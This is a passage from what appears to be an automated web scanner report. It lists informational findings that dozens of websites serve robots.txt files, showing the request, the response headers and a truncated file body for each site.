Confidence:   Certain
Host:   http://www.suzukipartshouse.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suzukipartshouse.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 Apr 2011 21:14:26 GMT
Accept-Ranges: bytes
ETag: "f5ff2399dfecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:33:21 GMT
Connection: close
Content-Length: 460

User-agent: ShopWiki
Disallow: /
User-agent: IRLbot
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-Agent: OmniExplorer_Bot
Disallow: /
User-Agent: twiceler
Disallow: /
User-Agent:
...[SNIP]...

27.1543. http://www.sw.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sw.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sw.org

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:29:09 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.30
Last-Modified: Tue, 19 Apr 2011 19:28:23 GMT
ETag: "c690005-629-4a14a82ec03c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 1577
Cache-Control: no-store
Pragma: no-cache
Via: 1.0 www.sw.org (Access Gateway 3.1.1-265)

# robots.txt file for http://www.sw.org
#
# Note: The default record (User-agent: *) should be the last one in the file.
# Many bots stop at the first record that matches their user agent,
#
...[SNIP]...

27.1544. http://www.sweetnicki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweetnicki.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweetnicki.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:37:12 GMT
Content-Type: text/plain
Content-Length: 36
Last-Modified: Sun, 16 Jan 2011 17:15:48 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Baiduspider
Disallow: /

27.1545. http://www.sweetpoison.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweetpoison.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweetpoison.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:56 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 30 Sep 2003 23:29:10 GMT
ETag: "5d-3c89461b37d80"
Accept-Ranges: bytes
Content-Length: 93
Connection: close
Content-Type: text/plain

User-Agent: FDSE
Disallow: /search/
Disallow: /site-map.html
Disallow: /images/
Disallow: /r/

27.1546. http://www.sweetsingles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweetsingles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweetsingles.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/plain
Last-Modified: Mon, 20 Apr 2009 12:52:51 GMT
Accept-Ranges: bytes
ETag: "6a8b2ceab6c1c91:27e"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:53:28 GMT
Connection: close

User-agent: *
Disallow: /default.asp
Disallow: /th/service/thailadies.html
Disallow: /Thaiwomen.html
Disallow: /thaiwomen.html
Disallow: /thailadies.html
Disallow: /thai_ladies.html
Disallow:
...[SNIP]...

27.1547. http://www.sytropin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sytropin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sytropin.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:28 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 30 Aug 2010 12:57:30 GMT
ETag: "892e8d-a2-48f0a01da85dd"
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 05:40:55 GMT
Content-Length: 162
Age: 7174

User-agent: *
Disallow: /old/
Disallow: /cgi-bin/
Disallow: /sudha/
Disallow: /sw/
Disallow: /stats/
Disallow: /hghfreetrail.html
Disallow: /splashfreetrial.html

27.1548. http://www.tableclothsfactory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tableclothsfactory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tableclothsfactory.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Tue, 19 Apr 2011 21:11:45 GMT
Accept-Ranges: bytes
ETag: "78c78063d6fecb1:1885"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:22:08 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

27.1549. http://www.tacomaworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tacomaworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tacomaworld.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:13 GMT
Server: Apache
Last-Modified: Sun, 25 Jul 2010 05:04:14 GMT
Accept-Ranges: bytes
Content-Length: 1614
Connection: close
Content-Type: text/plain

Sitemap: http://www.tacomaworld.com/forum/sitemap_index.xml.gz
Sitemap: http://www.tacomaworld.com/gallery/sitemap.xml.gz
Sitemap: http://www.tacomaworld.com/store/sitemap.xml.gz

User-agent: ia_archi
...[SNIP]...

27.1550. http://www.tagomatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagomatic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tagomatic.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:41 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 12 Jan 2011 06:59:16 GMT
ETag: "3345de-8c-499a0bd43d900"
Accept-Ranges: bytes
Content-Length: 140
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /upgrades_action.php
Disallow: /webmasters.php
Disallow: /go.php
Disallow: /go/
Disallow: /404_1/
Disallow: /404_2/

27.1551. http://www.tagsellit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagsellit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tagsellit.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:03 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 06 Jan 2011 02:51:19 GMT
ETag: "558059-532-49924937a97c0"
Accept-Ranges: bytes
Content-Length: 1330
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1552. http://www.tahiti-tourisme.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tahiti-tourisme.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tahiti-tourisme.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:55 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Tue, 17 Feb 2009 18:37:10 GMT
ETag: "90203dbe2e91c91:f0b"
Content-Length: 651

User-agent: *
Disallow: /Admin/
Disallow: /ARCHIVES/
Disallow: /aspnet_client/
Disallow: /calendar/
Disallow: /cgi/
Disallow: /cgi_DT/
Disallow: /css/
Disallow: /fckeditor/
Disallow: /flyers2
...[SNIP]...

27.1553. http://www.tahoesbest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tahoesbest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tahoesbest.com

Response

HTTP/1.1 200 OK
Keep-Alive: timeout=1, max=100
Content-Length: 865
Content-Type: text/plain
Last-Modified: Wed, 11 Mar 2009 21:35:38 GMT
Accept-Ranges: bytes
ETag: "5ad39f5191a2c91:1b51"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:26:41 GMT
Connection: close

# robots.txt for http://www.tahoesbest.com
User-agent: EmailSiphon # nasty spammer
Disallow: / # go away

User-agent: * # match any robot name
Disallow: /cgi-bin/ # no robots
...[SNIP]...

27.1554. http://www.talk2action.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talk2action.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.talk2action.org

Response

HTTP/1.1 200 OK
Expires: Wed, 04 May 2011 23:33:13 GMT
Cache-Control: max-age=172800
Vary: Accept-Encoding
Content-Type: text/plain
ETag: "2778850986"
Last-Modified: Tue, 10 May 2005 03:50:32 GMT
Server: lighttpd/1.4.28
Content-Length: 178
Date: Wed, 04 May 2011 02:09:47 GMT
X-Varnish: 45289126 45032866
Age: 95793
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /user
Disallow: /comments
Disallow: /poll
Disallow: /newuser
Disallow: /search
Disallow: /site/links_in
Disallow: /?op=
Disallow: /print
Disallow: /stats

27.1555. http://www.talkorigins.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkorigins.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.talkorigins.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:30 GMT
Server: Apache/1.3.42 (Unix) Sun-ONE-ASP/4.0.2 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Fri, 08 Dec 2006 02:16:53 GMT
ETag: "e4c825-375-4578cb15"
Accept-Ranges: bytes
Content-Length: 885
Connection: close
Content-Type: text/plain

# robots.txt for http://www.talkorigins.org/

# This document is to tell robots
# (sometimes called spiders) which are
# means of automatically grabbing our files
# what they can and cannot do. Robot
...[SNIP]...

27.1556. http://www.tammysrecipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tammysrecipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tammysrecipes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:12 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.7 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:16:12 GMT
Last-Modified: Thu, 23 Jul 2009 00:58:06 GMT
ETag: "5b414b-64a-4a67b59e"
Accept-Ranges: bytes
Content-Length: 1610
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.1557. http://www.taoofherbs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.taoofherbs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.taoofherbs.com

Response

HTTP/1.1 200 OK
Content-Length: 34
Content-Type: text/plain
Last-Modified: Tue, 12 Aug 2008 20:11:37 GMT
Accept-Ranges: bytes
ETag: "c2910a0b7fcc81:6a1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:59:45 GMT
Connection: close

User-agent: *
Disallow: /myacct

27.1558. http://www.taxadmin.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.taxadmin.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.taxadmin.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:11 GMT
Server: Apache/2.2.13 (iTools 9.0.5/Mac OS X) mod_ssl/2.2.13 OpenSSL/0.9.7l DAV/2 mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/5.2.6
Last-Modified: Fri, 13 Nov 2009 14:06:28 GMT
ETag: "bfa30-154-478412a7ec100"
Accept-Ranges: bytes
Content-Length: 340
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:08:11 GMT
Connection: close
Content-Type: text/plain


# robots.txt for http://www.taxadmin.org

User-agent: WebSTAR Search/5.0 (http://www.webstar.com/)
Disallow: #can access everything

User-agent: *

Disallow: /fta/pub/mf_dir/ # no searching of t
...[SNIP]...

27.1559. http://www.taxslayer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.taxslayer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.taxslayer.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 13 Dec 2010 16:43:05 GMT
Server: Microsoft-IIS/7.5
whosyadaddy: Online-Web-04
X-Powered-By: ASP.NET
Content-Length: 27
Etag: "f50882c0-1b-4dc0bc7a"
Age: 1894
Date: Wed, 04 May 2011 03:11:28 GMT
Connection: close

User-agent: *
Allow: /


27.1560. http://www.tbd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tbd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tbd.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 21:44:50 GMT
ETag: "4788c4c-23-4a1c51df3f880"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:37:27 GMT
Date: Wed, 04 May 2011 03:32:27 GMT
Content-Length: 35
Connection: close

User-agent: *
Disallow: /sandbox

27.1561. http://www.tblc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tblc.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tblc.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:07 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 24 Jun 2010 16:19:50 GMT
ETag: "2480fa-ed-6103580"
Accept-Ranges: bytes
Content-Length: 237
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /fspp/private
Disallow: /langbank
Disallow: /spl/Count.cgi
Disallow: /sunline/private
Disallow: /ws_admin
Disallow: /cfall
Disallow: /wiki
Disallow: /fspp
Disallow: /training
D
...[SNIP]...

27.1562. http://www.teaching-english-in-japan.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teaching-english-in-japan.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teaching-english-in-japan.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:06 GMT
Server: Apache
Last-Modified: Tue, 29 Jun 2004 03:41:03 GMT
Accept-Ranges: bytes
Content-Length: 183
Connection: close
Content-Type: text/plain

User-agent: Scooter
Disallow: /calls/

User-agent: SlySearch
Disallow: /

User-agent: turnitinbot
Disallow: /

User-agent: bumblebee
Disallow: /

User-agent: BunnySlippers
Disallow: /

27.1563. http://www.technewsdaily.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.technewsdaily.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 08:34:22 GMT
Server: Apache
Last-Modified: Mon, 16 Aug 2010 21:40:21 GMT
ETag: "2b0c165-11d-48df7ade8db40"
Accept-Ranges: bytes
Content-Length: 285
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

27.1564. http://www.techsoup.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techsoup.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techsoup.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:54:34 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Tue, 25 Aug 2009 20:13:19 GMT
ETag: "67122f7dc025ca1:17cb"
Content-Length: 1959

# Robots.txt for domain: http://www.techsoup.org
# crawl-delay has been set to 30 seconds per hit

User-agent: *
Disallow: /_archive/
Disallow: /_linking/
Disallow: /_temp/
Disallow: /common/

...[SNIP]...

27.1565. http://www.tedsmontanagrill.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tedsmontanagrill.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tedsmontanagrill.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:51:01 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Thu, 07 Oct 2010 00:12:57 GMT
ETag: "a329c3-20e-c18e7440"
Accept-Ranges: bytes
Content-Length: 526
Connection: close
Content-Type: text/plain

# Domain: http://www.tedsmontanagrill.com

User-agent: *
Disallow: /careers/
Disallow: /cashregister/
Disallow: /cr/
Disallow: /CtObjects/
Disallow: /downloads/
Disallow: /images/
Disallow: /
...[SNIP]...

27.1566. http://www.teen18yo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teen18yo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teen18yo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 31 Jul 2010 08:14:21 GMT
Accept-Ranges: bytes
ETag: "687f1608830cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:55:47 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


27.1567. http://www.teenomg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teenomg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teenomg.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 03:49:53 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi TELi OUR DELi SAMi STP IND PHY ONL UNI DEM PRE"
Status: 200
X-Quazar: ec2-184-73-11-29
Content-Length: 122
X-Varnish: 768878696
Via: 1.1 varnish
Cache-Control: max-age=3600, proxy-revalidate
Age: 0
X-Cache: MISS
X-QuazarCache: production_a

User-Agent: *
Disallow: /unsubscribe
Disallow: /privacy
Disallow: /*gatherer_id*
Disallow: /*q_result*
Disallow: /*from=*

27.1568. http://www.tehparadox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tehparadox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tehparadox.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:23:53 GMT
Content-Type: text/plain
Content-Length: 1682
Last-Modified: Sun, 18 Jul 2010 19:40:28 GMT
Connection: close
Vary: Accept-Encoding
Expires: Fri, 03 Jun 2011 03:23:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: Yandex
Disallow: /

User-agent: Yandex Something
Disallow: /

User-agent: Teoma
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: SeznamBot
Disallow: /

User-agent
...[SNIP]...

27.1569. http://www.tel3advantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tel3advantage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tel3advantage.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F143A3D3C34FE888327C6E862355CC84; Path=/
Set-Cookie: CRID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ETag: W/"711-1288032685243"
Last-Modified: Mon, 25 Oct 2010 18:51:25 GMT
Content-Type: text/plain
Content-Length: 711
Date: Wed, 04 May 2011 02:03:11 GMT
Connection: close

User-agent: *
Allow: /jsp/rates.jsp
Allow: /jsp/signup.jsp
Allow: /jsp/access_numbers.jsp
Disallow: /business/emails/
Disallow: /business/images/
Disallow: /business/include/
Disallow: /busines
...[SNIP]...

27.1570. http://www.telescopes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telescopes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.telescopes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:07:51 GMT
Server: Apache
Cache-Control: max-age=864000
Expires: Sat, 14 May 2011 03:07:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cart/
Disallow: /templates/
Disallow: /info/
Disallow: /shared/
Disallow: /checkout/
Disallow: /account/
Disallow: /js/
Disallow: /pp_Print.cfm?
Disallow: /pp_print.c
...[SNIP]...

27.1571. http://www.templates.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.templates.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.templates.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 00:46:08 GMT
Content-Type: text/plain
Content-Length: 280
Last-Modified: Wed, 10 Nov 2010 13:33:53 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Allow: /product/stock-music/*/*/
Disallow: /*?
Disallow: /product/*/*/*/
Disallow: /customization/
Disallow: /user_profile/
Disallow: /pages/info/
Disallow: /help/
Disallow: /recommend-

...[SNIP]...

27.1572. http://www.tennesseethisweek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tennesseethisweek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tennesseethisweek.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Last-Modified: Tue, 08 Sep 2009 19:38:53 GMT
ETag: "34626d74-65c-473161dc88d40"
Accept-Ranges: bytes
Content-Length: 1628
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:17:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1573. http://www.terabitz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terabitz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.terabitz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.1 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7
Last-Modified: Wed, 12 May 2010 05:37:16 GMT
ETag: "100-8e3bb00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 256
Connection: close
Via: 1.1 AN-0016020122545304

# Disallow all crawlers access to certain pages.
User-agent: *
Disallow: /cgi-bin/
Disallow: /classes/
Disallow: /fonts/
Disallow: /includes/
Disallow: /js/
Disallow: /script/
Disallow: /rss20
...[SNIP]...

27.1574. http://www.teriskitchen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teriskitchen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teriskitchen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:15 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Tue, 28 Aug 2001 19:11:16 GMT
ETag: "678bc3-37-3b8becd4"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwstat/


27.1575. http://www.tesco.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tesco.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tesco.net

Response

HTTP/1.1 200 OK
Content-Length: 81
Content-Type: text/plain
Last-Modified: Wed, 06 Apr 2011 15:51:38 GMT
Accept-Ranges: bytes
ETag: "061828372f4cb1:785"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MKNET: 01
Date: Wed, 04 May 2011 01:42:11 GMT
Connection: close

User-agent: *
Disallow: /default.asp

User-agent: *
Disallow: /bl/default.asp

27.1576. http://www.texasmonthly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texasmonthly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.texasmonthly.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: tm_session=79vf1o86mtob532r0a264556s2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: numVisits=1; expires=Sat, 01-May-2021 00:48:09 GMT; path=/; domain=www.texasmonthly.com
Content-Length: 554
Connection: close
Content-Type: text/html; charset=utf-8

User-agent: *
Disallow: /administration/
Disallow: /ads/
Disallow: /assets/
Disallow: /cadillac/
Disallow: /csc/
Disallow: /images/
Disallow: /mag/issues/csc/
Disallow: /mediafiles/
Disallow: /mp3
Dis
...[SNIP]...

27.1577. http://www.texasoutside.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texasoutside.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.texasoutside.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:12 GMT
Server: Apache
Last-Modified: Fri, 11 Aug 2006 01:19:50 GMT
ETag: "2cd06e9-87-41ab3bda4b980"
Accept-Ranges: bytes
Content-Length: 135
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# robots.txt for http://dev.texasoutside.com

User-agent: *
Disallow: /txorails/login/
Disallow: /phpads/

# end of robots.txt

27.1578. http://www.thaivisa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thaivisa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thaivisa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:49 GMT
Server: Apache
Last-Modified: Mon, 02 Aug 2010 10:04:08 GMT
ETag: "1ec8e7-97b-48cd452443600"
Accept-Ranges: bytes
Content-Length: 2427
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /forum/admin/
Disallow: /forum/cache/
Disallow: /forum/converge_local/
Disallow: /forum/hooks/
Disallow: /forum/ips_kernel/
Disallow: /forum/retail/
Disallow: /forum/
...[SNIP]...

27.1579. http://www.thane.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thane.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

